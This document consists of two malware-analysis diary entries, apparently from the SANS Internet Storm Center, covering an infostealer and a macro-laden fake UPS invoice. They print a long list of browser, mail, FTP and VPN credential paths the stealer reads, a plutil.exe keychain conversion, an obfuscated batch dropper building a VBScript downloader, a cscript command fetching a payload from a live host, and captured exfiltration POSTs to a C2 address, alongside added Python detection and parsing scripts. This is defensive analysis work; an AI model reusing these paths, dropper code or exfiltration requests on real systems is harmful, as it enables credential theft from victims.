Archive for January 9th, 2020

More Data Exfiltration, (Fri, Jan 10th)

Yesterday, I posted a quick analysis of a malicious document that exfiltrates data from the compromised computer[1]. Here is another one I found that also exfiltrates data. The malware is delivered in an ACE archive. This file format remains common in phishing campaigns because the detection rate is lower at email gateways (many of them can't handle the file format). The archive contains a PE file called 'Payment Copy.exe' (SHA256:88a6e2fd417d145b55125338b9f53ed3e16a6b27fae9a3042e187b5aa15d27aa). The payload is unknown on VT at this time.

The list of searched files and registry keys is interesting: the malware tests many credential databases and configuration files. Here is the list of extracted paths:

%USERPROFILE%\AppData\Local\Google\Chrome\User Data\LOGIN DATA
%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\4lddcdcq.hh3fwg7c.default\LOGINS.JSON
%USERPROFILE%\AppData\Local\TENCENT\QQBROWSER\USER DATA\DEFAULT\ENCRYPTEDSTORAGE
%USERPROFILE%\AppData\Roaming\OPERA SOFTWARE\OPERA STABLE\LOGIN DATA
%USERPROFILE%\AppData\Local\YANDEX\YANDEXBROWSER\USER DATA
%USERPROFILE%\AppData\Local\360CHROME\CHROME\USER DATA
%USERPROFILE%\AppData\Local\IRIDIUM\USER DATA
%USERPROFILE%\AppData\Local\COMODO\DRAGON\USER DATA
%USERPROFILE%\AppData\Local\MAPLESTUDIO\CHROMEPLUS\USER DATA
%USERPROFILE%\AppData\Local\CHROMIUM\USER DATA
%USERPROFILE%\AppData\Local\TORCH\USER DATA
%USERPROFILE%\AppData\Local\7STAR\7STAR\USER DATA
%USERPROFILE%\AppData\Local\AMIGO\USER DATA
%USERPROFILE%\AppData\Local\BRAVESOFTWARE\BRAVE-BROWSER\USER DATA
%USERPROFILE%\AppData\Local\CENTBROWSER\USER DATA
%USERPROFILE%\AppData\Local\CHEDOT\USER DATA
%USERPROFILE%\AppData\Local\COCCOC\BROWSER\USER DATA
%USERPROFILE%\AppData\Local\ELEMENTS BROWSER\USER DATA
%USERPROFILE%\AppData\Local\EPIC PRIVACY BROWSER\USER DATA
%USERPROFILE%\AppData\Local\KOMETA\USER DATA
%USERPROFILE%\AppData\Local\ORBITUM\USER DATA
%USERPROFILE%\AppData\Local\SPUTNIK\SPUTNIK\USER DATA
%USERPROFILE%\AppData\Local\UCOZMEDIA\URAN\USER DATA
%USERPROFILE%\AppData\Local\VIVALDI\USER DATA
%USERPROFILE%\AppData\Local\CATALINAGROUP\CITRIO\USER DATA
%USERPROFILE%\AppData\Local\LIEBAO\USER DATA
%USERPROFILE%\AppData\Local\FENRIR INC\SLEIPNIR5\SETTING\MODULES\CHROMIUMVIEWER
%USERPROFILE%\AppData\Local\QIP SURF\USER DATA
%USERPROFILE%\AppData\Local\COOWON\COOWON\USER DATA
%USERPROFILE%\AppData\Roaming\Mozilla\SEAMONKEY\PROFILES.INI
%USERPROFILE%\AppData\Roaming\FLOCK\BROWSER\PROFILES.INI
%USERPROFILE%\AppData\Local\UCBROWSER
%USERPROFILE%\AppData\Roaming\NETGATE TECHNOLOGIES\BLACKHAWK\PROFILES.INI
%USERPROFILE%\AppData\Roaming\8PECXSTUDIOS\CYBERFOX\PROFILES.INI
%USERPROFILE%\AppData\Roaming\K-MELEON\PROFILES.INI
%USERPROFILE%\AppData\Roaming\Mozilla\ICECAT\PROFILES.INI
%USERPROFILE%\AppData\Roaming\COMODO\ICEDRAGON\PROFILES.INI
%USERPROFILE%\AppData\Roaming\MOONCHILD PRODUCTIONS\PALE MOON\PROFILES.INI
%USERPROFILE%\AppData\Roaming\WATERFOX\PROFILES.INI
%USERPROFILE%\AppData\Local\FALKON\PROFILES\PROFILES.INI
Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A66760000002\POP3 Password
%USERPROFILE%\AppData\Roaming\THUNDERBIRD\PROFILES.INI
%USERPROFILE%\AppData\Local\VIRTUALSTORE\PROGRAM FILES\FOXMAIL\MAIL
%USERPROFILE%\AppData\Local\VIRTUALSTORE\PROGRAM FILES (X86)\FOXMAIL\MAIL
%USERPROFILE%\AppData\Roaming\OPERA MAIL\OPERA MAIL\WAND.DAT
%USERPROFILE%\AppData\Roaming\POCOMAIL\ACCOUNTS.INI
%USERPROFILE%\AppData\Roaming\THE BAT!
%USERPROFILE%\AppData\Roaming\POSTBOX\PROFILES.INI
%USERPROFILE%\AppData\Roaming\CLAWS-MAIL
%USERPROFILE%\AppData\Roaming\CLAWS-MAIL\CLAWSRC
%USERPROFILE%\AppData\Local\Temp\FOLDER.LST
%USERPROFILE%\AppData\Roaming\TRILLIAN\USERS\GLOBAL\ACCOUNTS.DAT
%USERPROFILE%\AppData\Roaming\PSI\PROFILES
%USERPROFILE%\AppData\Roaming\PSI+\PROFILES
%USERPROFILE%\AppData\Roaming\IPSWITCH\WS_FTP\SITES\WS_FTP.INI
%USERPROFILE%\AppData\Roaming\COREFTP\SITES.IDX
C:\FTP NAVIGATOR\FTPLIST.TXT
%USERPROFILE%\AppData\Roaming\FLASHFXP\3\QUICK.DAT
%USERPROFILE%\AppData\Roaming\SMARTFTP\CLIENT 2.0\FAVORITES\QUICK CONNECT
C:\CFTP\FTPLIST.TXT
%USERPROFILE%\AppData\Roaming\FTPGETTER\SERVERS.XML
C:\Program Files (x86)\JDOWNLOADER\CONFIG\DATABASE.SCRIPT
%USERPROFILE%\AppData\Local\Temp\LOG.TMP
\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging
\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Aerofox\FoxmailPreview
\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Aerofox\Foxmail\V3.1
\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\IncrediMail\Identities
\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Qualcomm\Eudora\CommandLine
\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\RimArts\B2\Settings
\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\OpenVPN-GUI\configs
\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\FTPWare\COREFTP\Sites
\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\DownloadManager\Passwords

Who said that the browser market is restricted to IE, Firefox, Chrome, Safari & Opera?

Another tool used by the malware attracted my attention: 'plutil.exe'. It is part of the Apple Application Support (32-bit) package. The tool is completely legitimate and is installed when you add Apple software to a Windows system (Safari, iCloud, ...). Its purpose is to process Property List files[2] used by Apple. Here it is invoked to convert keychain.plist into plain XML:

C:\Program Files (x86)\Common Files\Apple\Apple Application Support\plutil.exe -convert xml1 -s -o
   "%USERPROFILE%\AppData\Local\Temp\fixed_keychain.xml"
   "%USERPROFILE%\AppData\Roaming\Apple Computer\Preferences\keychain.plist"

It could be a good idea to track access to these paths by uncommon process names (for example via a dedicated Sysmon configuration).
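As an added example (not code from the diary), here is one way to implement that tracking offline: a small Python script that applies a subset of the path list above to file-access and process-creation events, flags reads of a credential store by any process other than the store's normal owner, and flags a plutil.exe invocation against keychain.plist as seen with this sample. The expected-owner mapping, the event record format and the sample events are assumptions made for this example, not telemetry from the diary.

```python
"""Flag credential-store access by processes that should not touch those files.

Added example, not code from the diary. The event records below are
constructed to resemble file-audit / process-creation telemetry; the
"expected owner" executables are assumptions for this example.
"""
import fnmatch
import ntpath
import re

# Subset of the locations searched by the sample (from the path list above),
# as case-insensitive glob patterns relative to %USERPROFILE%, each mapped to
# the executables that normally own the file (assumed owners, for this example).
CREDENTIAL_STORES = {
    r"appdata\local\google\chrome\user data\*\login data": {"chrome.exe"},
    r"appdata\roaming\mozilla\firefox\profiles\*\logins.json": {"firefox.exe"},
    r"appdata\roaming\thunderbird\profiles.ini": {"thunderbird.exe"},
    r"appdata\roaming\ipswitch\ws_ftp\sites\ws_ftp.ini": {"ws_ftp.exe"},
    r"appdata\roaming\apple computer\preferences\keychain.plist": {"icloud.exe", "safari.exe"},
}

# Matches "c:\users\<name>\" so expanded profile paths normalise like %USERPROFILE%.
PROFILE_PREFIX = re.compile(r"^[a-z]:\\users\\[^\\]+\\")


def relative_to_profile(path):
    """Lower-case the path and strip the %USERPROFILE% or C:\\Users\\<name>\\ prefix."""
    p = path.lower()
    if p.startswith("%userprofile%\\"):
        return p[len("%userprofile%\\"):]
    m = PROFILE_PREFIX.match(p)
    return p[m.end():] if m else p


def matched_store(path):
    """Return (pattern, owners) when the path is a known credential store, else None."""
    rel = relative_to_profile(path)
    for pattern, owners in CREDENTIAL_STORES.items():
        if fnmatch.fnmatchcase(rel, pattern):
            return pattern, owners
    return None


def analyse_events(events):
    """Apply two rules: a foreign process reading a credential store, and
    plutil.exe being used to convert keychain.plist (the trick seen above)."""
    alerts = []
    for ev in events:
        image = ntpath.basename(ev["image"]).lower()
        if ev["type"] == "file_access":
            hit = matched_store(ev["target"])
            if hit and image not in hit[1]:
                alerts.append({"rule": "credential-store-access", "image": image, "detail": ev["target"]})
        elif ev["type"] == "process_create":
            if image == "plutil.exe" and "keychain.plist" in ev["cmdline"].lower():
                alerts.append({"rule": "plutil-keychain-conversion", "image": image, "detail": ev["cmdline"]})
    return alerts


# Constructed events (not real telemetry): a normal browser read, the sample
# reading two stores, the plutil.exe command from the diary, and benign noise.
SAMPLE_EVENTS = [
    {"type": "file_access", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file_access", "image": r"C:\Users\alice\Downloads\Payment Copy.exe",
     "target": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file_access", "image": r"C:\Users\alice\Downloads\Payment Copy.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\4lddcdcq.hh3fwg7c.default\logins.json"},
    {"type": "process_create",
     "image": r"C:\Program Files (x86)\Common Files\Apple\Apple Application Support\plutil.exe",
     "cmdline": r'plutil.exe -convert xml1 -s -o "%USERPROFILE%\AppData\Local\Temp\fixed_keychain.xml" '
                r'"%USERPROFILE%\AppData\Roaming\Apple Computer\Preferences\keychain.plist"'},
    {"type": "file_access", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\alice\Documents\notes.txt"},
]

if __name__ == "__main__":
    for alert in analyse_events(SAMPLE_EVENTS):
        print(alert)
```

On a real host the read side needs a source that records file reads (a SACL on the store directories with Windows object-access auditing, or an EDR sensor), because Sysmon has no file-read event; Sysmon's process-creation event does carry the full plutil.exe command line, so the second rule works directly on that.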

[1] https://isc.sans.edu/forums/diary/Quick+Analyzis+of+another+Maldoc/25694/
[2] https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/AboutInformationPropertyListFiles.html

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.



Quick Analysis of a(nother) Maldoc, (Thu, Jan 9th)

Yesterday, one of our readers (thanks David!) submitted a malicious document disguised as a UPS invoice. Like David, do not hesitate to share samples with us: we like malware samples! I briefly checked the document. Nothing new: it is based on a classic macro, it was easy to analyze, and I can give you an overview of the infection process and of what kind of data can be exfiltrated.

The malicious document was called 'ups_invoice_0701932_262.doc' (SHA256:be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af) and currently has a VT score of 10/61[1]. It contains macros that, once the document is opened, perform the malicious activity:

# oledump.py ups_invoice_0701932_262_doc 
A: word/vbaProject.bin
 A1:       734 'PROJECT'
 A2:        30 'PROJECTlk'
 A3:       233 'PROJECTwm'
 A4:        97 'UserForm1/x01CompObj'
 A5:       294 'UserForm1/x03VBFrame'
 A6:       883 'UserForm1/f'
 A7:      6688 'UserForm1/o'
 A8: M    1453 'VBA/Module1'
 A9: M   21943 'VBA/Module2'
A10: M    2239 'VBA/Module3'
A11: M    2331 'VBA/Module4'
A12: M  252836 'VBA/NewMacros'
A13: m     938 'VBA/ThisDocument'
A14: m    1493 'VBA/UserForm1'
A15:      8300 'VBA/_VBA_PROJECT'
A16:      1302 'VBA/dir'
A17: M  412655 'VBA/wLoadImages'

The infection path is the following: Word > Macro > Batch File (.cmd) > VBScript > Windows PE

The macro dumps a batch file to disk (SHA256:96d785cdc95bff2f081f57d2c9fdee3b76daf1c3295d2b9e6298678ed32953b9). The dropped file is '%APPDATA%\..\EnableDelayedExpansion\Documents1.CMD'. Most of its commands are simple "echo" statements used to build a VBS script, '%APPDATA%\..\EnableDelayedExpansion\gdibits.vbs'.

Sample of the code, padded with garbage words to make it harder to read:

@echo off
echo "93319427177886784668351442764871949889113678316627428857276359"
set mtspf=%APPDATA%\..\EnableDelayedExpansion\gdibits.vbs
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo Dim hResBit, MpicOffer, xmpage, MenuPrice, ListPrice, Fundament, BufferBat >> %mtspf%
echo On Error Resume Next >> %mtspf%
echo. >> %mtspf%
echo Set hResBit = Wscript.Arguments >> %mtspf%
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo "471495911668846928514952834168735538343318577458669595"
echo "137756746277365597113689825816848246219143776556384827"
echo "589196889244714223435471453592227671689523411938182673"
echo "714793381962982623587978735968646573151481843754943393"
echo Set MpicOffer = CreateObject("MSXML2.ServerXMLHTTP.6.0") >> %mtspf%
echo "72797134559562738358938549883642286878881617597196952189815336"
echo ListPrice = hResBit(0) >> %mtspf%
echo Fundament = hResBit(1) >> %mtspf%
echo 'The most common question that restaurants are asking us revolve >> %mtspf%
echo 'special accommodations) that may be requested >> %mtspf%
echo. >> %mtspf%
echo MpicOffer.Open "GET", ListPrice, False >> %mtspf%

Then the VBS script is launched with two arguments (see the Wscript.Arguments call above):

cscript //nologo %APPDATA%\..\EnableDelayedExpansion\gdibits.vbs hxxps://greatingusa[.]com/red1.res %APPDATA%\..\EnableDelayedExpansion\hddput8.exe

Finally, hddput8.exe is launched:

start %APPDATA%\..\EnableDelayedExpansion\hddput8.exe"

The PE file (SHA256:cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158) has a VT score of 44/72[2].
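As an added example (not the diary's code), the following Python script undoes this kind of dropper: it walks the batch file, records the set variables, collects every "echo ... >> %var%" line into the file it targets, discards the numeric junk echoes and the VBS comment filler, and lists the cscript/start launches with their arguments so the download URL and payload path are visible at a glance. SAMPLE_BATCH is a constructed excerpt modelled on the dropper shown above, not the sample's actual content, and the function names are mine.

```python
"""Rebuild the VBScript that an obfuscated batch dropper writes with "echo".

Added example, not the diary's code. SAMPLE_BATCH is a constructed excerpt
modelled on the dropper above (same structure, not the sample's bytes).
"""
import re

SAMPLE_BATCH = r'''@echo off
echo "93319427177886784668351442764871949889113678316627428857276359"
set mtspf=%APPDATA%\..\EnableDelayedExpansion\gdibits.vbs
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo Dim hResBit, MpicOffer, ListPrice, Fundament >> %mtspf%
echo On Error Resume Next >> %mtspf%
echo. >> %mtspf%
echo Set hResBit = Wscript.Arguments >> %mtspf%
echo "471495911668846928514952834168735538343318577458669595"
echo Set MpicOffer = CreateObject("MSXML2.ServerXMLHTTP.6.0") >> %mtspf%
echo ListPrice = hResBit(0) >> %mtspf%
echo Fundament = hResBit(1) >> %mtspf%
echo 'special accommodations) that may be requested >> %mtspf%
echo MpicOffer.Open "GET", ListPrice, False >> %mtspf%
cscript //nologo %APPDATA%\..\EnableDelayedExpansion\gdibits.vbs hxxps://greatingusa[.]com/red1.res %APPDATA%\..\EnableDelayedExpansion\hddput8.exe
start %APPDATA%\..\EnableDelayedExpansion\hddput8.exe
'''

SET_RE = re.compile(r"^set\s+(\w+)=(.+?)\s*$", re.IGNORECASE)
# "echo text >> %var%" and the blank-line idiom "echo. >> %var%"
ECHO_RE = re.compile(r"^echo(?:\.|\s+(.*?))\s*>>\s*%(\w+)%\s*$", re.IGNORECASE)
LAUNCH_RE = re.compile(r"^(cscript|wscript|start)\s+(.*)$", re.IGNORECASE)


def rebuild_dropped_scripts(batch_text, strip_comments=True):
    """Return {var: {"path": ..., "lines": [...]}} for every file the batch
    builds by appending echo output. Bare echo lines with no redirection (the
    numeric junk) are ignored; VBS comment lines (starting with ') are dropped
    when strip_comments is set, since in this dropper they carry only filler."""
    variables, scripts = {}, {}
    for raw in batch_text.splitlines():
        line = raw.strip()
        m = SET_RE.match(line)
        if m:
            variables[m.group(1)] = m.group(2)
            continue
        m = ECHO_RE.match(line)
        if not m:
            continue
        text, var = m.group(1), m.group(2)
        text = "" if text is None else text.rstrip()
        if strip_comments and text.startswith("'"):
            continue
        entry = scripts.setdefault(var, {"path": variables.get(var), "lines": []})
        entry["lines"].append(text)
    return scripts


def find_launches(batch_text):
    """Collect cscript/wscript/start invocations with their arguments."""
    launches = []
    for raw in batch_text.splitlines():
        m = LAUNCH_RE.match(raw.strip())
        if not m:
            continue
        # drop script-host options such as //nologo; what remains is target + args
        tokens = [t for t in m.group(2).split() if not t.startswith("//")]
        launches.append({"host": m.group(1).lower(), "target": tokens[0], "args": tokens[1:]})
    return launches


if __name__ == "__main__":
    for var, script in rebuild_dropped_scripts(SAMPLE_BATCH).items():
        print(f"--- {var} -> {script['path']}")
        print("\n".join(script["lines"]))
    for launch in find_launches(SAMPLE_BATCH):
        print(launch)
```

Running it prints the reconstructed VBS (eight lines of real code out of the excerpt) followed by the cscript launch, whose two arguments are exactly the URL and output path that the script reads through Wscript.Arguments.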

Here are some HTTP POST requests with exfiltrated data performed by the malware:

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=aksgja8s8d8a8s97
User-Agent: KSKJJGJ
Host: 203.176.135.102:8082
Content-Length: 4419
Cache-Control: no-cache

--aksgja8s8d8a8s97
Content-Disposition: form-data; name="proclist"

***TASK LIST***

[System Process]
System
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
lsm.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
spoolsv.exe
svchost.exe
taskhost.exe
dwm.exe
svchost.exe
svchost.exe
svchost.exe
notepad.exe
calc.exe
svchost.exe
notepad.exe
explorer.exe
iexplore.exe
WmiPrvSE.exe
rundll32.exe
svchost.exe

--aksgja8s8d8a8s97
Content-Disposition: form-data; name="sysinfo"

***S Y S T E M I N F O***

HostName: 3OwiR2Q
OSName: Microsoft Windows 7 Professional 
OSVersion: Service Pack 1
OSArchitecture: 64-bit
ProductType: Workstation
BuildType: Multiprocessor Free
RegisteredOwner: Zahwl3xniYy
RegisteredOrg: CVDh5l614
SerialNumber: 00371-222-2524677-68218
InstallDate: 30/12/1899 00.00.00
LastBootUpTime: 30/12/1899 00.00.00
WindowsDirectory: C:\Windows
SystemDirectory: C:\Windows\system32
BootDevice: \Device\HarddiskVolume1
TotalPhysicalMemory: 3127 Mb
AvailablePhysicalMemory: 3127 Mb


/c ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : 
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Realtek RTL8139C+ Fast Ethernet NIC
   Physical Address. . . . . . . . . : 
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : (Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.100.6(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Thursday, January 09, 2019 6:19:19 AM
   Lease Expires . . . . . . . . . . : Thursday, January 16, 2156 1:08:23 AM
   Default Gateway . . . . . . . . . : 192.168.100.1
   DHCP Server . . . . . . . . . . . : 192.168.100.1
   DHCPv6 IAID . . . . . . . . . . . : 240276480
   DHCPv6 Client DUID. . . . . . . . : 
   DNS Servers . . . . . . . . . . . : 8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Disabled


/c net config workstation
Computer name                        \
Full Computer name                   
User name                            Administrator

Workstation active on                
Software version                     Windows 7 Professional

Workstation domain                   WORKGROUP
Workstation Domain DNS Name          .com
Logon domain                         TESTER

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250

The command completed successfully.

/c net view /all
There are no entries in the list.

/c net view /all /domain
There are no entries in the list.

/c nltest /domain_trusts
Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

/c nltest /domain_trusts /all_trusts
Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

--aksgja8s8d8a8s97--

HTTP/1.1 200 OK
server: Cowboy
date: Thu, 09 Jan 2020 09:41:52 GMT
content-length: 3
Content-Type: text/plain

/1/

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------PAOUUIBNQKZQDUJR
Content-Length: 210

-----------PAOUUIBNQKZQDUJR
Content-Disposition: form-data; name="data"

-----------PAOUUIBNQKZQDUJR
Content-Disposition: form-data; name="source"

OpenSSH private keys
-----------PAOUUIBNQKZQDUJR--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:42:07 GMT
content-length: 3
Content-Type: text/plain

/1/

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/83/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------QPKAEZSIUTKMSAWM
Content-Length: 299

-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="formdata"

{]}

-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="billinfo"

{]}
-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="cardinfo"

{SQL logic error
-----------QPKAEZSIUTKMSAWM--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:41:16 GMT
content-length: 3
Content-Type: text/plain

/1/

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------ITSDTHZDVZQGMVVI
Content-Length: 219

-----------ITSDTHZDVZQGMVVI
Content-Disposition: form-data; name="data"

-----------ITSDTHZDVZQGMVVI
Content-Disposition: form-data; name="source"

OpenVPN passwords and configs
-----------ITSDTHZDVZQGMVVI--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:41:41 GMT
content-length: 3
Content-Type: text/plain

/1/

Note that, at the time of writing this diary, the domain 'greatingusa[.]com' is still active.
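As an added example (not code from the diary), here is a small parser for captures like the ones above: it splits a raw HTTP request into request line, headers and body, walks the multipart/form-data parts using the boundary from Content-Type, and summarises what each part carried. SAMPLE_REQUEST is reconstructed from the "OpenSSH private keys" request above with CRLF line endings; the function names are mine.

```python
"""Parse a captured multipart/form-data POST and list what was exfiltrated.

Added example, not the diary's code. SAMPLE_REQUEST is rebuilt from the
"OpenSSH private keys" request shown above, re-joined with CRLF endings.
"""
import re

SAMPLE_REQUEST = "\r\n".join([
    "POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1",
    "Accept: */*",
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
    ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
    "InfoPath.3; .NET4.0C; .NET4.0E)",
    "Host: 203.176.135.102",
    "Connection: close",
    "Content-Type: multipart/form-data; boundary=---------PAOUUIBNQKZQDUJR",
    "Content-Length: 210",
    "",
    # Each delimiter line is "--" + boundary (RFC 2046), which is why the body
    # shows eleven leading dashes while the Content-Type header shows nine.
    "-----------PAOUUIBNQKZQDUJR",
    'Content-Disposition: form-data; name="data"',
    "",
    "-----------PAOUUIBNQKZQDUJR",
    'Content-Disposition: form-data; name="source"',
    "",
    "OpenSSH private keys",
    "-----------PAOUUIBNQKZQDUJR--",
    "",
])


def parse_http_request(raw):
    """Split a raw request into method, path, lower-cased headers and body."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def parse_multipart(body, content_type):
    """Return [{"name": ..., "content": ...}] for each form-data part."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("not multipart/form-data")
    delimiter = "--" + m.group(1)
    parts = []
    for chunk in body.split(delimiter)[1:]:   # index 0 is the preamble
        if chunk.startswith("--"):             # closing delimiter: boundary + "--"
            break
        chunk = chunk.lstrip("\n")
        part_head, _, content = chunk.partition("\n\n")
        if content.endswith("\n"):             # line break that precedes the next delimiter
            content = content[:-1]
        name = re.search(r'name="([^"]*)"', part_head)
        parts.append({"name": name.group(1) if name else None, "content": content})
    return parts


def summarise_exfil(raw):
    """One-line inventory of a stealer POST: where it went and what each part held."""
    req = parse_http_request(raw)
    parts = parse_multipart(req["body"], req["headers"].get("content-type", ""))
    return {
        "host": req["headers"].get("host"),
        "path": req["path"],
        "parts": {p["name"]: len(p["content"]) for p in parts},
        "source": next((p["content"] for p in parts if p["name"] == "source"), None),
    }


if __name__ == "__main__":
    print(summarise_exfil(SAMPLE_REQUEST))
```

Run over the captures above, the summary shows the pattern worth noting in triage: the "data" part is empty while "source" names the store that was searched, so even an unsuccessful lookup tells the receiving server (and the analyst) what the stealer went after.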

[1] https://www.virustotal.com/gui/file/be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af/detection
[2] https://www.virustotal.com/gui/file/cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

